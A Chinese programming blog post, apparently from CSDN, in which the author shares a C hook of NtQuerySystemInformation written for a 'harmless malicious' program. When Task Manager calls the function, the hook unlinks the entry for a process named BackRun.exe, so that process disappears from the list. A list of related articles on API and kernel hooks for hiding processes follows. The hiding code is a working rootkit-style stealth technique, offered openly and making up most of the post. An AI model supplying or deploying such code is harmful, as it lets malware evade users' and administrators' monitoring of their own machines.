使用APIHOOK实现进程隐藏

最新推荐文章于 2021-12-03 13:39:19 发布
最新推荐文章于 2021-12-03 13:39:19 发布
阅读量688 收藏
点赞数
文章标签: 移动开发 数据结构与算法 操作系统

今天翻出一些今年前写的代码。其中一个是09年,我帮一个读研的同学写的一个“无公害恶意”程序。大致要求就是要实现自启动和自我隐藏。我使用的都是些简单的技术,只是实现自我隐藏稍微让我花费了点时间写算法。其实这个算法也很简单,就是大学时候写的从一个单向链表中删除一个元素。

APIhook我这儿就不说了,网上很多开源的代码,我只贴出“删除元素”的代码。

NTSTATUS WINAPI Hook_NtQuerySystemInformation( SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID lpSystemInformation, ULONG ulSystemInformationLength, PULONG pulReturnLength) { // 调用原始NtQuerySystemInformation NTSTATUS nResult = ((PNtQuerySystemInformation)(PROC) g_NtQuerySystemInformation) (SystemInformationClass, lpSystemInformation, ulSystemInformationLength, pulReturnLength); if( 0 != nResult) { return nResult; } // 获取调用模块路径 WCHAR FilaPath[MAX_PATH] = {0}; GetModuleFileName( NULL, FilaPath, MAX_PATH ); // 获取调用模块的名称 WCHAR* pFileName= NULL; pFileName = PathFindFileName(FilaPath); // 这是计算进程名在结构体中的偏移 // typedef struct _SYSTEM_PROCESS_INFORMATION // { // ULONG dwNextEntryOffset; // 下段结构对象的偏移 // ULONG dwNumberOfThreads; // 线程数 // LARGE_INTEGER qSpareLi1; // LARGE_INTEGER qSpareLi2; // LARGE_INTEGER qSpareLi3; // LARGE_INTEGER qCreateTime; // 创建时间 // LARGE_INTEGER qUserTime; // 用户态时间 // LARGE_INTEGER qKernelTime; // 内核态时间 // UNICODE_STRING ImageName; // 文件名(非路径) // …… // } // 2 * sizeof(USHORT)是因为UNICODE_STRING得定义: // typedef struct _UNICODE_STRING { // USHORT Length; // USHORT MaximumLength; // PWSTR Buffer; // } UNICODE_STRING; DWORD dwnameoffset = 2 * sizeof(ULONG) + 6 * sizeof(LARGE_INTEGER) + 2 * sizeof(USHORT); if ( 0 != wcscmp( pFileName, L"taskmgr.exe" ) || 5 != SystemInformationClass ) { //只是过滤windows任务管理器 return nResult; } LPVOID lpAddr = lpSystemInformation; // 获取第二个数据块的偏移 ULONG ulNextEntryOffset = 0; // 因为_SYSTEM_PROCESS_INFORMATION的第一个元素就是dwNextEntryOffset memcpy_s( &ulNextEntryOffset, sizeof(ULONG), lpAddr, sizeof(ULONG) ); // 保存前一个数据块的“下个数据偏移” ULONG ulBeforeNextEntryOffset = ulNextEntryOffset; // 保存当前数据块的“下个数据偏移” ULONG ulCurrentNextEntryOffset = ulNextEntryOffset; // 保存后一个数据块的“下个数据偏移” ULONG ulAfterNextEntryOffset = ulNextEntryOffset; // 保存前一个数据块的起始地址 PCHAR pchBeforeAddr = (PCHAR) lpSystemInformation; // 保存当前数据块的起始地址 PCHAR pchCurrentAddr = (PCHAR) lpSystemInformation; // 保存下个数据块的起始地址 PCHAR pchNextAddr = pchCurrentAddr; BOOL bidle = TRUE; while( 0 != ulNextEntryOffset ) { // 下个数据块的起始地址=当前数据块的地址+当前数据块的“下个数据偏移” pchNextAddr = pchCurrentAddr + ulCurrentNextEntryOffset; // 保存下个数据的“下个数据偏移” memcpy_s( &ulNextEntryOffset, sizeof(ULONG), (PVOID)pchNextAddr, sizeof(ULONG) ); // 指向每个数据块中进程名的指针 PCHAR pchNameAddr = NULL; // 过滤第一个进程system idle。这个进程在这个进程信息结构体中没有名字 if( FALSE != bidle ) { // 获取指向进程名的指针 memcpy_s( &pchNameAddr, sizeof(PCHAR), (PVOID)(pchCurrentAddr+dwnameoffset), sizeof(PCHAR)); if( 0 == wcscmp( (PWCHAR)(pchNameAddr), L"BackRun.exe")) { // 让上个数据块的“下个数据偏移”=上个数据块的“下个数据偏移”+当前数据块的“下个数据偏移”,跳过当前数据块 DWORD dwGoToNextOffset = ulBeforeNextEntryOffset + ulCurrentNextEntryOffset; SIZE_T size_nouse = 0; // 将数据写入内存 if (!WriteProcessMemory( GetCurrentProcess(), (PVOID) pchBeforeAddr, (PVOID) (&dwGoToNextOffset), sizeof(DWORD), &size_nouse )) ; memcpy_s( &ulNextEntryOffset, sizeof(ULONG), pchNextAddr, sizeof(ULONG) ); } } else { bidle = FALSE; } pchBeforeAddr = pchCurrentAddr; ulBeforeNextEntryOffset = ulCurrentNextEntryOffset; pchCurrentAddr = pchNextAddr; ulCurrentNextEntryOffset = ulNextEntryOffset; } // Return the result back to the caller return nResult; }

iteye_17377
关注
[原创]一个简单的windows HOOK - 隐藏进程管理器中特定的进程
享受开发,颠倒银河
09-07 4977
一个简单的windows HOOK - 隐藏进程管理器中特定的进程 (适用平台:windows 2000 sp4,windows XP sp2)         屏蔽任务管理器中的进程名称有很多种方法,可以在ring0级做文章:修改内核进程链表,拦截内核API等。我这里只给出win32下的实现,原理是最普通的 windows 钩子机制。实现语言 win32 汇编 (masm32
HOOK API 之修改IAT实现进程隐藏
tian028的博客
03-13 1045
1 .技术与实现 每个调用的 API 函数地址都保存在 IAT 表中。 API 函数调用时,每个输入节( IMPORT SECTION )所指向的 IAT 结构如下图所示。 程序中每个调用API 函数的CALL指令所使用的地址都是相应函数登记在IAT表的地址。所以为了截获API 函数,我们将IAT表中的地址换成用户自己的API PROXY函数地址,这样每个API调用都是先调用用户自己的A...
进程隐藏API HOOK
weixin_42071117的博客
10-20 1193
// 在Windows中,用户进程的所有操作都是基于WIN32 API实现的,例如使用任务管理器来查看进程等操作。 // API HOOK技术是一种改变API执行结果的技术。 // PS:ZwQuerySystemInformation函数: // 功能:获取指定的系统信息。 // 原型:NTSTASTUS WINAPI ZwQuerySystemInformation ( // _In_ SYSTEM_INFORMATION_CLASS SystemInformationClass,
hook_进程隐藏
07-16
windowsxp/7 进程隐藏 驱动 Hook ZwQuerySystemInformation 来实现进程隐藏的一种比较古老的技术,希望对初学者有用。
SSDT-hook进程隐藏和文件隐藏
11-30
Windows内核态SSDT-hook实现进程隐藏和文件隐藏,代码很规整,学习内核编程的好例子 -a good example of studying kernel programing or driver developing, SSDT hook
易语言-apihook达到对指定进程隐藏窗口
06-25
在本案例中,我们讨论的是使用易语言实现API Hook,从而达到对指定进程隐藏窗口的目的。易语言是一种中文编程语言,它以简洁的词汇和语法为特点,适合初学者学习。 API Hook的基本原理是通过在目标进程的调用链中...
APIHook.rar_APIHOOK_api hide_api to hide process_hook_隐藏进程
09-22
标题“APIHook.rar_APIHOOK_api hide_api to hide process_hook_隐藏进程”表明此压缩包文件内容涉及API Hook技术,特别是利用它来隐藏进程实现方法。 API Hook的基本原理是将系统调用或库函数的原始实现替换为...
hook-zwquerysysteminformation.rar_hook_进程隐藏
07-14
在IT领域,尤其是系统安全和恶意软件分析中,"hook-zwquerysysteminformation.rar_hook_进程隐藏"这个主题涉及到的是Windows操作系统中的一种高级技术——钩子(Hook)机制,以及如何利用它来隐藏进程。这里我们将...
API Hook 工具相关代码 apihooktest.rar_API_APIHOOK_api hook_apihooktest
09-21
API Hook是一种技术,它允许程序员拦截和修改其他进程中的函数调用。...同时,由于API Hook常被恶意软件用来隐藏行为或绕过安全检查,因此在分析未知代码时,了解和识别API Hook技术也是必不可少的技能。
基于HOOK的应用层进程隐藏
weixin_40921670的博客
07-24 1397
基于HOOK的应用层进程隐藏 要求:开发一个可以将指定的用户进程进行隐藏工具,要求在“任务管理器”无法检测的该用户进程,也无法终止该进程。 一、HOOK原理 对于 Hook 技术,可以分为两块,第一块是在 Ring3 层的 Hook,俗称应用层 Hook 技术,而另外一块自然是在 Ring0 层得 Hook,俗称为内核层 Hook 技术,而在 Ring3 层的 Hook 基本上可以分为两种大的类型,第一类即是 Windows 消息的 Hook,第二类则是 Windows APIHook。每个调用的 A
VC++ api hook 源码 带示例
01-10
VC++ api hook 源码 带示例
线程注入、HOOK APIs(附VC6源码)
01-13
  博客:http://blog.csdn.net/beanjoy/article/details/8497307   工作关系,想HOOK并修改一些API,使得不支持某些设备的第三方工具可以正常运行,因此花时间写了这么个工具。比如ReadFile时,某些设备不支持指定的缓存大小(如512KB),可以HOOK ReadFile,把缓存大小修改为更小,可能ReadFile就能正常工作,第三方工具也能正常使用。其实,只是想借工作这个契机,学习远程线程注入和HOOK API。工作上测试的设备和第三方工具运行在64位机上,还没有时间在64位机上修改并编译。   代码中已实现同时HOOK9个API,稍加修改,即可实现HOOK更多的API
逆向工程核心原理读书笔记-API钩取之隐藏进程(二)
liujiayu2的专栏
06-09 879
上一篇文章我们实现隐藏进程如果重新打开任务管理器或者被隐藏进程就没有隐藏的效果了。为了弥补这个问题,我们不仅需要钩取当前运行的所有进程,还要钩取将来运行的所有进程。由于所有的进程都是由父进程使用CreateProcess创建的,所以只要钩取父进程(通常是explorer.exe)的CreateProcess将dll注入所有子进程就可以实现了。要注意下面两个问题。 1.CreateProces
HOOK和Inline-HOOK进程隐藏技术全面解析
perddy的专栏
01-22 3188
  图片: 800)this.width=800;if(this.height>600)this.height=600;" onclick="if(this.width>=800) window.open(http://www.luobo.cc/attachment/12_53590_32d0c19821432d7.jpg);" src="http://www.luob
Hook API用法解析——useRef、useImperativeHandle
泊一的博客
12-03 435
文章目录一、[useRef](https://react.docschina.org/docs/hooks-reference.html#useref)二、[useImperativeHandle](https://react.docschina.org/docs/hooks-reference.html#useimperativehandle) 一、useRef useRef 会在每次渲染时返回同一个 ref 对象,这是因为它创建的是一个普通 Javascript 对象。 而 useRef() 和自建一个
API Hook应用简介
众里寻她千百度
08-23 3155
许久未写博客了,整个5月份与6月份都在做未知病毒检测的相关课题,其中的核心技术就是API Hook与支持向量机算法(SVM),大体的做法就是使用API Hook得到可疑进程API调用序列,然后以API 调用序列为特征输入SVM系统来判断该程序是否疑似病毒。本文主要就API Hook的一些技术做了简介,其中重点是如何对正在运行的进程注入Hook函数。   1、概述 windows系统下的编程
React Hooks入门:手写一个 useAPI
weixin_30299709的博客
07-16 729
react-hooks 入门 写在最前面 最近项目 升级了react 16.8+,接入了 hooks,这里学习一下最基础的几个官方 hooks 下面是官网文档的链接,基础知识掌握不牢靠的朋友可以再看看,官网的文档可以说是非常完整和浅出了。我的文章主要讨论具体的几个 hooks 的具体使用场景。 zh-hans.reactjs.org/docs/hooks-… 1、useEffect...
Hook技术之API拦截(API Hook)
热门推荐
bobopeng
06-02 3万+
Inline Hook就是修改
Hook API用法解析——useContext和useReducer
泊一的博客
10-18 372
文章目录useContext和useReducer1. [useContext](https://react.docschina.org/docs/hooks-reference.html#usecontext)2. [useReducer](https://react.docschina.org/docs/hooks-reference.html#usereducer)3. 用 useContext + useReducer 替代 redux参考地址 useContext和useReducer 1. us
易语言hook隐藏进程
最新发布
12-19
易语言是一种简单易学的编程语言,通过它我们可以实现一些简单的功能。...在易语言中,我们可以使用API Hooking工具实现进程隐藏。然而,需要注意操作系统权限并谨慎操作,以免对系统产生不可预测的影响。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值